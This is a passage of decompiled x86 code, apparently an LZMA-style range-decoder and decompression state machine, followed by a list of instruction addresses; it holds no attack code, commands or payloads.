											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x004071dc
                                                          0x004071e4
                                                          0x004071eb
                                                          0x004071ed
                                                          0x004071f4
                                                          0x004071f8
                                                          0x004071f8
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407035
                                                          0x00407038
                                                          0x00407038
                                                          0x0040703e
                                                          0x0040703e
                                                          0x004067da
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687d
